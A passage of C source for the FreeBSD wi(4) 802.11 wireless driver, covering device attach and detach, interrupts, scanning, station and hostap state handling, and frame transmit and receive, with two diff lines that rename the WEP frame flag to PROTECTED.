IEEE80211_RATE_MAXSIZE) nrates = IEEE80211_RATE_MAXSIZE; rs->rs_nrates = 0; for (i = 0; i < nrates; i++) if (ratebuf[2+i]) rs->rs_rates[rs->rs_nrates++] = ratebuf[2+i]; } else { /* XXX fallback on error? */ } buflen = sizeof(val); if ((sc->sc_flags & WI_FLAGS_HAS_DBMADJUST) && wi_read_rid(sc, WI_RID_DBM_ADJUST, &val, &buflen) == 0) { sc->sc_dbm_offset = le16toh(val); } sc->sc_portnum = WI_DEFAULT_PORT; ieee80211_ifattach(ic, macaddr); ic->ic_raw_xmit = wi_raw_xmit; ic->ic_scan_start = wi_scan_start; ic->ic_scan_end = wi_scan_end; ic->ic_set_channel = wi_set_channel; ic->ic_vap_create = wi_vap_create; ic->ic_vap_delete = wi_vap_delete; ic->ic_update_mcast = wi_update_mcast; ic->ic_update_promisc = wi_update_promisc; ieee80211_radiotap_attach(ic, &sc->sc_tx_th.wt_ihdr, sizeof(sc->sc_tx_th), WI_TX_RADIOTAP_PRESENT, &sc->sc_rx_th.wr_ihdr, sizeof(sc->sc_rx_th), WI_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); error = bus_setup_intr(dev, sc->irq, INTR_TYPE_NET | INTR_MPSAFE, NULL, wi_intr, sc, &sc->wi_intrhand); if (error) { device_printf(dev, "bus_setup_intr() failed! 
(%d)\n", error); ieee80211_ifdetach(ic); if_free(sc->sc_ifp); wi_free(dev); return error; } return (0); } int wi_detach(device_t dev) { struct wi_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; WI_LOCK(sc); /* check if device was removed */ sc->wi_gone |= !bus_child_present(dev); wi_stop_locked(sc, 0); WI_UNLOCK(sc); ieee80211_ifdetach(ic); bus_teardown_intr(dev, sc->irq, sc->wi_intrhand); if_free(sc->sc_ifp); wi_free(dev); mtx_destroy(&sc->sc_mtx); return (0); } static struct ieee80211vap * wi_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct wi_softc *sc = ic->ic_ifp->if_softc; struct wi_vap *wvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; wvp = (struct wi_vap *) malloc(sizeof(struct wi_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (wvp == NULL) return NULL; vap = &wvp->wv_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); vap->iv_max_aid = WI_MAX_AID; switch (opmode) { case IEEE80211_M_STA: sc->sc_porttype = WI_PORTTYPE_BSS; wvp->wv_newstate = vap->iv_newstate; vap->iv_newstate = wi_newstate_sta; /* need to filter mgt frames to avoid confusing state machine */ wvp->wv_recv_mgmt = vap->iv_recv_mgmt; vap->iv_recv_mgmt = wi_recv_mgmt; break; case IEEE80211_M_IBSS: sc->sc_porttype = sc->sc_ibss_port; wvp->wv_newstate = vap->iv_newstate; vap->iv_newstate = wi_newstate_sta; break; case IEEE80211_M_AHDEMO: sc->sc_porttype = WI_PORTTYPE_ADHOC; break; case IEEE80211_M_HOSTAP: sc->sc_porttype = WI_PORTTYPE_HOSTAP; wvp->wv_newstate = vap->iv_newstate; vap->iv_newstate = wi_newstate_hostap; break; case IEEE80211_M_MONITOR: sc->sc_porttype = sc->sc_monitor_port; break; default: break; } /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, wi_media_status); ic->ic_opmode = opmode; return vap; } static void wi_vap_delete(struct ieee80211vap *vap) { struct wi_vap *wvp = WI_VAP(vap); ieee80211_vap_detach(vap); free(wvp, M_80211_VAP); } int wi_shutdown(device_t dev) { struct wi_softc *sc = device_get_softc(dev); wi_stop(sc, 1); return (0); } void wi_intr(void *arg) { struct wi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; u_int16_t status; WI_LOCK(sc); if (sc->wi_gone || !sc->sc_enabled || (ifp->if_flags & IFF_UP) == 0) { CSR_WRITE_2(sc, WI_INT_EN, 0); CSR_WRITE_2(sc, WI_EVENT_ACK, 0xFFFF); WI_UNLOCK(sc); return; } /* Disable interrupts. */ CSR_WRITE_2(sc, WI_INT_EN, 0); status = CSR_READ_2(sc, WI_EVENT_STAT); if (status & WI_EV_RX) wi_rx_intr(sc); if (status & WI_EV_ALLOC) wi_tx_intr(sc); if (status & WI_EV_TX_EXC) wi_tx_ex_intr(sc); if (status & WI_EV_INFO) wi_info_intr(sc); if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_DRV_IS_EMPTY(&ifp->if_snd)) wi_start_locked(ifp); /* Re-enable interrupts. 
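 * (Interrupts were masked at the top of wi_intr() so the pending events could
 * be serviced without the card raising new ones; the write below restores the
 * normal WI_INTRS mask.)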
*/ CSR_WRITE_2(sc, WI_INT_EN, WI_INTRS); WI_UNLOCK(sc); return; } static void wi_enable(struct wi_softc *sc) { /* Enable interrupts */ CSR_WRITE_2(sc, WI_INT_EN, WI_INTRS); /* enable port */ wi_cmd(sc, WI_CMD_ENABLE | sc->sc_portnum, 0, 0, 0); sc->sc_enabled = 1; } static int wi_setup_locked(struct wi_softc *sc, int porttype, int mode, uint8_t mac[IEEE80211_ADDR_LEN]) { int i; wi_reset(sc); wi_write_val(sc, WI_RID_PORTTYPE, porttype); wi_write_val(sc, WI_RID_CREATE_IBSS, mode); wi_write_val(sc, WI_RID_MAX_DATALEN, 2304); /* XXX IEEE80211_BPF_NOACK wants 0 */ wi_write_val(sc, WI_RID_ALT_RETRY_CNT, 2); if (sc->sc_flags & WI_FLAGS_HAS_ROAMING) wi_write_val(sc, WI_RID_ROAMING_MODE, 3); /* NB: disabled */ wi_write_rid(sc, WI_RID_MAC_NODE, mac, IEEE80211_ADDR_LEN); /* Allocate fids for the card */ sc->sc_buflen = IEEE80211_MAX_LEN + sizeof(struct wi_frame); for (i = 0; i < sc->sc_ntxbuf; i++) { int error = wi_alloc_fid(sc, sc->sc_buflen, &sc->sc_txd[i].d_fid); if (error) { device_printf(sc->sc_dev, "tx buffer allocation failed (error %u)\n", error); return error; } sc->sc_txd[i].d_len = 0; } sc->sc_txcur = sc->sc_txnext = 0; return 0; } static void wi_init_locked(struct wi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int wasenabled; WI_LOCK_ASSERT(sc); wasenabled = sc->sc_enabled; if (wasenabled) wi_stop_locked(sc, 1); if (wi_setup_locked(sc, sc->sc_porttype, 3, IF_LLADDR(ifp)) != 0) { if_printf(ifp, "interface not running\n"); wi_stop_locked(sc, 1); return; } ifp->if_drv_flags |= IFF_DRV_RUNNING; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; callout_reset(&sc->sc_watchdog, hz, wi_watchdog, sc); wi_enable(sc); /* Enable desired port */ } void wi_init(void *arg) { struct wi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; WI_LOCK(sc); wi_init_locked(sc); WI_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void wi_stop_locked(struct wi_softc *sc, int disable) { struct ifnet *ifp = sc->sc_ifp; WI_LOCK_ASSERT(sc); if (sc->sc_enabled && !sc->wi_gone) { CSR_WRITE_2(sc, WI_INT_EN, 0); wi_cmd(sc, WI_CMD_DISABLE | sc->sc_portnum, 0, 0, 0); if (disable) sc->sc_enabled = 0; } else if (sc->wi_gone && disable) /* gone --> not enabled */ sc->sc_enabled = 0; callout_stop(&sc->sc_watchdog); sc->sc_tx_timer = 0; sc->sc_false_syns = 0; ifp->if_drv_flags &= ~(IFF_DRV_OACTIVE | IFF_DRV_RUNNING); } void wi_stop(struct wi_softc *sc, int disable) { WI_LOCK(sc); wi_stop_locked(sc, disable); WI_UNLOCK(sc); } static void wi_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct wi_softc *sc = ifp->if_softc; DPRINTF(("%s: channel %d, %sscanning\n", __func__, ieee80211_chan2ieee(ic, ic->ic_curchan), ic->ic_flags & IEEE80211_F_SCAN ? "" : "!")); WI_LOCK(sc); wi_write_val(sc, WI_RID_OWN_CHNL, ieee80211_chan2ieee(ic, ic->ic_curchan)); WI_UNLOCK(sc); } static void wi_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct wi_softc *sc = ifp->if_softc; struct ieee80211_scan_state *ss = ic->ic_scan; DPRINTF(("%s\n", __func__)); WI_LOCK(sc); /* * Switch device to monitor mode. 
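 * (The Intersil firmware apparently needs the port disabled and re-enabled for
 * a port-type change to take effect, hence the WI_CMD_DISABLE/WI_CMD_ENABLE
 * pair below; the full dwell time is also forced to compensate for that
 * overhead.)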
*/ wi_write_val(sc, WI_RID_PORTTYPE, sc->sc_monitor_port); if (sc->sc_firmware_type == WI_INTERSIL) { wi_cmd(sc, WI_CMD_DISABLE | WI_PORT0, 0, 0, 0); wi_cmd(sc, WI_CMD_ENABLE | WI_PORT0, 0, 0, 0); } /* force full dwell time to compensate for firmware overhead */ ss->ss_mindwell = ss->ss_maxdwell = msecs_to_ticks(400); WI_UNLOCK(sc); } static void wi_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct wi_softc *sc = ifp->if_softc; DPRINTF(("%s: restore port type %d\n", __func__, sc->sc_porttype)); WI_LOCK(sc); wi_write_val(sc, WI_RID_PORTTYPE, sc->sc_porttype); if (sc->sc_firmware_type == WI_INTERSIL) { wi_cmd(sc, WI_CMD_DISABLE | WI_PORT0, 0, 0, 0); wi_cmd(sc, WI_CMD_ENABLE | WI_PORT0, 0, 0, 0); } WI_UNLOCK(sc); } static void wi_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m, int subtype, int rssi, int nf) { struct ieee80211vap *vap = ni->ni_vap; switch (subtype) { case IEEE80211_FC0_SUBTYPE_AUTH: case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: /* NB: filter frames that trigger state changes */ return; } WI_VAP(vap)->wv_recv_mgmt(ni, m, subtype, rssi, nf); } static int wi_newstate_sta(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct ieee80211_node *bss; struct wi_softc *sc = ifp->if_softc; DPRINTF(("%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate])); if (nstate == IEEE80211_S_AUTH) { WI_LOCK(sc); wi_setup_locked(sc, WI_PORTTYPE_BSS, 3, vap->iv_myaddr); if (vap->iv_flags & IEEE80211_F_PMGTON) { wi_write_val(sc, WI_RID_MAX_SLEEP, ic->ic_lintval); wi_write_val(sc, WI_RID_PM_ENABLED, 1); } wi_write_val(sc, WI_RID_RTS_THRESH, vap->iv_rtsthreshold); if (sc->sc_flags & WI_FLAGS_HAS_FRAGTHR) wi_write_val(sc, WI_RID_FRAG_THRESH, vap->iv_fragthreshold); wi_write_txrate(sc, vap); bss = vap->iv_bss; wi_write_ssid(sc, WI_RID_DESIRED_SSID, bss->ni_essid, bss->ni_esslen); wi_write_val(sc, WI_RID_OWN_CHNL, ieee80211_chan2ieee(ic, bss->ni_chan)); /* Configure WEP. */ if (ic->ic_cryptocaps & IEEE80211_CRYPTO_WEP) wi_write_wep(sc, vap); else sc->sc_encryption = 0; if ((sc->sc_flags & WI_FLAGS_HAS_WPASUPPORT) && (vap->iv_flags & IEEE80211_F_WPA)) { wi_write_val(sc, WI_RID_WPA_HANDLING, 1); if (vap->iv_appie_wpa != NULL) wi_write_appie(sc, WI_RID_WPA_DATA, vap->iv_appie_wpa); } wi_enable(sc); /* enable port */ /* Lucent firmware does not support the JOIN RID. */ if (sc->sc_firmware_type == WI_INTERSIL) { struct wi_joinreq join; memset(&join, 0, sizeof(join)); IEEE80211_ADDR_COPY(&join.wi_bssid, bss->ni_bssid); join.wi_chan = htole16( ieee80211_chan2ieee(ic, bss->ni_chan)); wi_write_rid(sc, WI_RID_JOIN_REQ, &join, sizeof(join)); } WI_UNLOCK(sc); /* * NB: don't go through 802.11 layer, it'll send auth frame; * instead we drive the state machine from the link status * notification we get on association. 
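 * (This is why iv_state is set directly below rather than chaining to the
 * saved wv_newstate handler, which is only used for the other state
 * transitions.)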
*/ vap->iv_state = nstate; return (0); } return WI_VAP(vap)->wv_newstate(vap, nstate, arg); } static int wi_newstate_hostap(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct ieee80211_node *bss; struct wi_softc *sc = ifp->if_softc; int error; DPRINTF(("%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate])); error = WI_VAP(vap)->wv_newstate(vap, nstate, arg); if (error == 0 && nstate == IEEE80211_S_RUN) { WI_LOCK(sc); wi_setup_locked(sc, WI_PORTTYPE_HOSTAP, 0, vap->iv_myaddr); bss = vap->iv_bss; wi_write_ssid(sc, WI_RID_OWN_SSID, bss->ni_essid, bss->ni_esslen); wi_write_val(sc, WI_RID_OWN_CHNL, ieee80211_chan2ieee(ic, bss->ni_chan)); wi_write_val(sc, WI_RID_BASIC_RATE, 0x3); wi_write_val(sc, WI_RID_SUPPORT_RATE, 0xf); wi_write_txrate(sc, vap); wi_write_val(sc, WI_RID_OWN_BEACON_INT, bss->ni_intval); wi_write_val(sc, WI_RID_DTIM_PERIOD, vap->iv_dtim_period); wi_write_val(sc, WI_RID_RTS_THRESH, vap->iv_rtsthreshold); if (sc->sc_flags & WI_FLAGS_HAS_FRAGTHR) wi_write_val(sc, WI_RID_FRAG_THRESH, vap->iv_fragthreshold); if ((sc->sc_flags & WI_FLAGS_HAS_ENHSECURITY) && (vap->iv_flags & IEEE80211_F_HIDESSID)) { /* * bit 0 means hide SSID in beacons, * bit 1 means don't respond to bcast probe req */ wi_write_val(sc, WI_RID_ENH_SECURITY, 0x3); } if ((sc->sc_flags & WI_FLAGS_HAS_WPASUPPORT) && (vap->iv_flags & IEEE80211_F_WPA) && vap->iv_appie_wpa != NULL) wi_write_appie(sc, WI_RID_WPA_DATA, vap->iv_appie_wpa); wi_write_val(sc, WI_RID_PROMISC, 0); /* Configure WEP. */ if (ic->ic_cryptocaps & IEEE80211_CRYPTO_WEP) wi_write_wep(sc, vap); else sc->sc_encryption = 0; wi_enable(sc); /* enable port */ WI_UNLOCK(sc); } return error; } static void wi_start_locked(struct ifnet *ifp) { struct wi_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct ieee80211_frame *wh; struct mbuf *m0; struct ieee80211_key *k; struct wi_frame frmhdr; const struct llc *llc; int cur; WI_LOCK_ASSERT(sc); if (sc->wi_gone) return; memset(&frmhdr, 0, sizeof(frmhdr)); cur = sc->sc_txnext; for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m0); if (m0 == NULL) break; if (sc->sc_txd[cur].d_len != 0) { IFQ_DRV_PREPEND(&ifp->if_snd, m0); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m0->m_pkthdr.rcvif; /* reconstruct 802.3 header */ wh = mtod(m0, struct ieee80211_frame *); switch (wh->i_fc[1]) { case IEEE80211_FC1_DIR_TODS: IEEE80211_ADDR_COPY(frmhdr.wi_ehdr.ether_shost, wh->i_addr2); IEEE80211_ADDR_COPY(frmhdr.wi_ehdr.ether_dhost, wh->i_addr3); break; case IEEE80211_FC1_DIR_NODS: IEEE80211_ADDR_COPY(frmhdr.wi_ehdr.ether_shost, wh->i_addr2); IEEE80211_ADDR_COPY(frmhdr.wi_ehdr.ether_dhost, wh->i_addr1); break; case IEEE80211_FC1_DIR_FROMDS: IEEE80211_ADDR_COPY(frmhdr.wi_ehdr.ether_shost, wh->i_addr3); IEEE80211_ADDR_COPY(frmhdr.wi_ehdr.ether_dhost, wh->i_addr1); break; } llc = (const struct llc *)( mtod(m0, const uint8_t *) + ieee80211_hdrsize(wh)); frmhdr.wi_ehdr.ether_type = llc->llc_snap.ether_type; frmhdr.wi_tx_ctl = htole16(WI_ENC_TX_802_11|WI_TXCNTL_TX_EX); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { ieee80211_free_node(ni); m_freem(m0); continue; } frmhdr.wi_tx_ctl |= htole16(WI_TXCNTL_NOCRYPT); } if (ieee80211_radiotap_active_vap(ni->ni_vap)) { sc->sc_tx_th.wt_rate = ni->ni_txrate; ieee80211_radiotap_tx(ni->ni_vap, m0); } m_copydata(m0, 0, sizeof(struct ieee80211_frame), 
(caddr_t)&frmhdr.wi_whdr); m_adj(m0, sizeof(struct ieee80211_frame)); frmhdr.wi_dat_len = htole16(m0->m_pkthdr.len); ieee80211_free_node(ni); if (wi_start_tx(ifp, &frmhdr, m0)) continue; sc->sc_txnext = cur = (cur + 1) % sc->sc_ntxbuf; ifp->if_opackets++; } } static void wi_start(struct ifnet *ifp) { struct wi_softc *sc = ifp->if_softc; WI_LOCK(sc); wi_start_locked(ifp); WI_UNLOCK(sc); } static int wi_start_tx(struct ifnet *ifp, struct wi_frame *frmhdr, struct mbuf *m0) { struct wi_softc *sc = ifp->if_softc; int cur = sc->sc_txnext; int fid, off, error; fid = sc->sc_txd[cur].d_fid; off = sizeof(*frmhdr); error = wi_write_bap(sc, fid, 0, frmhdr, sizeof(*frmhdr)) != 0 || wi_mwrite_bap(sc, fid, off, m0, m0->m_pkthdr.len) != 0; m_freem(m0); if (error) { ifp->if_oerrors++; return -1; } sc->sc_txd[cur].d_len = off; if (sc->sc_txcur == cur) { if (wi_cmd(sc, WI_CMD_TX | WI_RECLAIM, fid, 0, 0)) { if_printf(ifp, "xmit failed\n"); sc->sc_txd[cur].d_len = 0; return -1; } sc->sc_tx_timer = 5; } return 0; } static int wi_raw_xmit(struct ieee80211_node *ni, struct mbuf *m0, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct ieee80211vap *vap = ni->ni_vap; struct wi_softc *sc = ifp->if_softc; struct ieee80211_key *k; struct ieee80211_frame *wh; struct wi_frame frmhdr; int cur; int rc = 0; WI_LOCK(sc); if (sc->wi_gone) { rc = ENETDOWN; goto out; } memset(&frmhdr, 0, sizeof(frmhdr)); cur = sc->sc_txnext; if (sc->sc_txd[cur].d_len != 0) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; rc = ENOBUFS; goto out; } m0->m_pkthdr.rcvif = NULL; m_copydata(m0, 4, ETHER_ADDR_LEN * 2, (caddr_t)&frmhdr.wi_ehdr); frmhdr.wi_ehdr.ether_type = 0; wh = mtod(m0, struct ieee80211_frame *); frmhdr.wi_tx_ctl = htole16(WI_ENC_TX_802_11|WI_TXCNTL_TX_EX); if (params && (params->ibp_flags & IEEE80211_BPF_NOACK)) frmhdr.wi_tx_ctl |= htole16(WI_TXCNTL_ALTRTRY); - if ((wh->i_fc[1] & IEEE80211_FC1_WEP) && + if ((wh->i_fc[1] & IEEE80211_FC1_PROTECTED) && (!params || (params && (params->ibp_flags & IEEE80211_BPF_CRYPTO)))) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { rc = ENOMEM; goto out; } frmhdr.wi_tx_ctl |= htole16(WI_TXCNTL_NOCRYPT); } if (ieee80211_radiotap_active_vap(vap)) { sc->sc_tx_th.wt_rate = ni->ni_txrate; ieee80211_radiotap_tx(vap, m0); } m_copydata(m0, 0, sizeof(struct ieee80211_frame), (caddr_t)&frmhdr.wi_whdr); m_adj(m0, sizeof(struct ieee80211_frame)); frmhdr.wi_dat_len = htole16(m0->m_pkthdr.len); if (wi_start_tx(ifp, &frmhdr, m0) < 0) { m0 = NULL; rc = EIO; goto out; } m0 = NULL; sc->sc_txnext = cur = (cur + 1) % sc->sc_ntxbuf; out: WI_UNLOCK(sc); if (m0 != NULL) m_freem(m0); ieee80211_free_node(ni); return rc; } static int wi_reset(struct wi_softc *sc) { #define WI_INIT_TRIES 3 int i, error = 0; for (i = 0; i < WI_INIT_TRIES; i++) { error = wi_cmd(sc, WI_CMD_INI, 0, 0, 0); if (error == 0) break; DELAY(WI_DELAY * 1000); } sc->sc_reset = 1; if (i == WI_INIT_TRIES) { if_printf(sc->sc_ifp, "reset failed\n"); return error; } CSR_WRITE_2(sc, WI_INT_EN, 0); CSR_WRITE_2(sc, WI_EVENT_ACK, 0xFFFF); /* Calibrate timer. 
*/ wi_write_val(sc, WI_RID_TICK_TIME, 8); return 0; #undef WI_INIT_TRIES } static void wi_watchdog(void *arg) { struct wi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; WI_LOCK_ASSERT(sc); if (!sc->sc_enabled) return; if (sc->sc_tx_timer && --sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); ifp->if_oerrors++; wi_init_locked(ifp->if_softc); return; } callout_reset(&sc->sc_watchdog, hz, wi_watchdog, sc); } static int wi_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct wi_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: WI_LOCK(sc); /* * Can't do promisc and hostap at the same time. If all that's * changing is the promisc flag, try to short-circuit a call to * wi_init() by just setting PROMISC in the hardware. */ if (ifp->if_flags & IFF_UP) { if (ic->ic_opmode != IEEE80211_M_HOSTAP && ifp->if_drv_flags & IFF_DRV_RUNNING) { if ((ifp->if_flags ^ sc->sc_if_flags) & IFF_PROMISC) { wi_write_val(sc, WI_RID_PROMISC, (ifp->if_flags & IFF_PROMISC) != 0); } else { wi_init_locked(sc); startall = 1; } } else { wi_init_locked(sc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) wi_stop_locked(sc, 1); sc->wi_gone = 0; } sc->sc_if_flags = ifp->if_flags; WI_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void wi_media_status(struct ifnet *ifp, struct ifmediareq *imr) { struct ieee80211vap *vap = ifp->if_softc; struct ieee80211com *ic = vap->iv_ic; struct wi_softc *sc = ic->ic_ifp->if_softc; u_int16_t val; int rate, len; len = sizeof(val); if (sc->sc_enabled && wi_read_rid(sc, WI_RID_CUR_TX_RATE, &val, &len) == 0 && len == sizeof(val)) { /* convert to 802.11 rate */ val = le16toh(val); rate = val * 2; if (sc->sc_firmware_type == WI_LUCENT) { if (rate == 10) rate = 11; /* 5.5Mbps */ } else { if (rate == 4*2) rate = 11; /* 5.5Mbps */ else if (rate == 8*2) rate = 22; /* 11Mbps */ } vap->iv_bss->ni_txrate = rate; } ieee80211_media_status(ifp, imr); } static void wi_sync_bssid(struct wi_softc *sc, u_int8_t new_bssid[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni = vap->iv_bss; if (IEEE80211_ADDR_EQ(new_bssid, ni->ni_bssid)) return; DPRINTF(("wi_sync_bssid: bssid %s -> ", ether_sprintf(ni->ni_bssid))); DPRINTF(("%s ?\n", ether_sprintf(new_bssid))); /* In promiscuous mode, the BSSID field is not a reliable * indicator of the firmware's BSSID. Damp spurious * change-of-BSSID indications. */ if ((ifp->if_flags & IFF_PROMISC) != 0 && !ppsratecheck(&sc->sc_last_syn, &sc->sc_false_syns, WI_MAX_FALSE_SYNS)) return; sc->sc_false_syns = MAX(0, sc->sc_false_syns - 1); #if 0 /* * XXX hack; we should create a new node with the new bssid * and replace the existing ic_bss with it but since we don't * process management frames to collect state we cheat by * reusing the existing node as we know wi_newstate will be * called and it will overwrite the node state. 
*/ ieee80211_sta_join(ic, ieee80211_ref_node(ni)); #endif } static __noinline void wi_rx_intr(struct wi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct wi_frame frmhdr; struct mbuf *m; struct ieee80211_frame *wh; struct ieee80211_node *ni; int fid, len, off; u_int8_t dir; u_int16_t status; int8_t rssi, nf; fid = CSR_READ_2(sc, WI_RX_FID); /* First read in the frame header */ if (wi_read_bap(sc, fid, 0, &frmhdr, sizeof(frmhdr))) { CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_RX); ifp->if_ierrors++; DPRINTF(("wi_rx_intr: read fid %x failed\n", fid)); return; } /* * Drop undecryptable or packets with receive errors here */ status = le16toh(frmhdr.wi_status); if (status & WI_STAT_ERRSTAT) { CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_RX); ifp->if_ierrors++; DPRINTF(("wi_rx_intr: fid %x error status %x\n", fid, status)); return; } len = le16toh(frmhdr.wi_dat_len); off = ALIGN(sizeof(struct ieee80211_frame)); /* * Sometimes the PRISM2.x returns bogusly large frames. Except * in monitor mode, just throw them away. */ if (off + len > MCLBYTES) { if (ic->ic_opmode != IEEE80211_M_MONITOR) { CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_RX); ifp->if_ierrors++; DPRINTF(("wi_rx_intr: oversized packet\n")); return; } else len = 0; } if (off + len > MHLEN) m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); else m = m_gethdr(M_NOWAIT, MT_DATA); if (m == NULL) { CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_RX); ifp->if_ierrors++; DPRINTF(("wi_rx_intr: MGET failed\n")); return; } m->m_data += off - sizeof(struct ieee80211_frame); memcpy(m->m_data, &frmhdr.wi_whdr, sizeof(struct ieee80211_frame)); wi_read_bap(sc, fid, sizeof(frmhdr), m->m_data + sizeof(struct ieee80211_frame), len); m->m_pkthdr.len = m->m_len = sizeof(struct ieee80211_frame) + len; m->m_pkthdr.rcvif = ifp; CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_RX); rssi = frmhdr.wi_rx_signal; nf = frmhdr.wi_rx_silence; if (ieee80211_radiotap_active(ic)) { struct wi_rx_radiotap_header *tap = &sc->sc_rx_th; uint32_t rstamp; rstamp = (le16toh(frmhdr.wi_rx_tstamp0) << 16) | le16toh(frmhdr.wi_rx_tstamp1); tap->wr_tsf = htole64((uint64_t)rstamp); /* XXX replace divide by table */ tap->wr_rate = frmhdr.wi_rx_rate / 5; tap->wr_flags = 0; if (frmhdr.wi_status & WI_STAT_PCF) tap->wr_flags |= IEEE80211_RADIOTAP_F_CFP; if (m->m_flags & M_WEP) tap->wr_flags |= IEEE80211_RADIOTAP_F_WEP; tap->wr_antsignal = rssi; tap->wr_antnoise = nf; } /* synchronize driver's BSSID with firmware's BSSID */ wh = mtod(m, struct ieee80211_frame *); dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; if (ic->ic_opmode == IEEE80211_M_IBSS && dir == IEEE80211_FC1_DIR_NODS) wi_sync_bssid(sc, wh->i_addr3); WI_UNLOCK(sc); ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, nf); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); WI_LOCK(sc); } static __noinline void wi_tx_ex_intr(struct wi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct wi_frame frmhdr; int fid; fid = CSR_READ_2(sc, WI_TX_CMP_FID); /* Read in the frame header */ if (wi_read_bap(sc, fid, 0, &frmhdr, sizeof(frmhdr)) == 0) { u_int16_t status = le16toh(frmhdr.wi_status); /* * Spontaneous station disconnects appear as xmit * errors. Don't announce them and/or count them * as an output error. 
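	 * (Such completions carry WI_TXSTAT_DISCONNECT in the status word and are only counted via if_collisions below as a rough indicator.)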
*/ if ((status & WI_TXSTAT_DISCONNECT) == 0) { if (ppsratecheck(&lasttxerror, &curtxeps, wi_txerate)) { if_printf(ifp, "tx failed"); if (status & WI_TXSTAT_RET_ERR) printf(", retry limit exceeded"); if (status & WI_TXSTAT_AGED_ERR) printf(", max transmit lifetime exceeded"); if (status & WI_TXSTAT_DISCONNECT) printf(", port disconnected"); if (status & WI_TXSTAT_FORM_ERR) printf(", invalid format (data len %u src %6D)", le16toh(frmhdr.wi_dat_len), frmhdr.wi_ehdr.ether_shost, ":"); if (status & ~0xf) printf(", status=0x%x", status); printf("\n"); } ifp->if_oerrors++; } else { DPRINTF(("port disconnected\n")); ifp->if_collisions++; /* XXX */ } } else DPRINTF(("wi_tx_ex_intr: read fid %x failed\n", fid)); CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_TX_EXC); } static __noinline void wi_tx_intr(struct wi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int fid, cur; if (sc->wi_gone) return; fid = CSR_READ_2(sc, WI_ALLOC_FID); CSR_WRITE_2(sc, WI_EVENT_ACK, WI_EV_ALLOC); cur = sc->sc_txcur; if (sc->sc_txd[cur].d_fid != fid) { if_printf(ifp, "bad alloc %x != %x, cur %d nxt %d\n", fid, sc->sc_txd[cur].d_fid, cur, sc->sc_txnext); return; } sc->sc_tx_timer = 0; sc->sc_txd[cur].d_len = 0; sc->sc_txcur = cur = (cur + 1) % sc->sc_ntxbuf; if (sc->sc_txd[cur].d_len == 0) ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; else 